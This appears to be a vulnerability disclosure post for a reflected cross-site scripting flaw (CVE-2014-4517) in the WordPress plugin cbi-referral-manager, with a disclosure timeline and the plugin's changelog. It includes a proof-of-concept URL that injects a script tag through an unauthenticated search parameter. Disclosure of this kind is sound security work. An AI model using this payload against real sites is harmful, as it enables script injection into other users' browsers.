wp-plugin : cbi-referral-manager – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : cbi-referral-manager

 

Effected Version : 1.2.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/cbireferralmanager/getNetworkSites.php?searchString=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&page=&search=Filter

 

 

XSS(3)

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-16

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4517

 
Plugin Description :
 
This plugin implements a site link list in the sidebar page area. The list is sorted and filtered by the number of visitors sent from each particular link owner as well as relevance from matching keywords. The list can be limited to a number of results. Visitors can submit their site to the list and receive an
affiliate link to place in their site.

New site submissions must be approved in the admin page.

This plugin will create a set of database tables to store unique visitors IP addresses, affiliate details and
affiliate traffic details.

Version: 1.2.1 Admin network sites now has searching and next/prev pages for available sites to add.
Version: 1.2.0 Admin cleanup. Preliminary support for global affiliate network. All approved sites are added to a global site repository that is available to all referral manager plugin users to add to their site.
Version: 1.1.1 Improves the ranking sorting with post title, body and category as well as new bullets to the links displayed.
Version: 1.1.0 Links are now ranked by relevance from keywords in visible post and the amount of traffic the site brings. Aesthetic cleanup.
Version: 1.0.2 Fixes a bug in the reffered.php file so that it loads the main site if the landing page is not set.
Version: 1.0.1 Cleans up the admin tools and includes an edit link function

Leave a Reply

Your email address will not be published. Required fields are marked *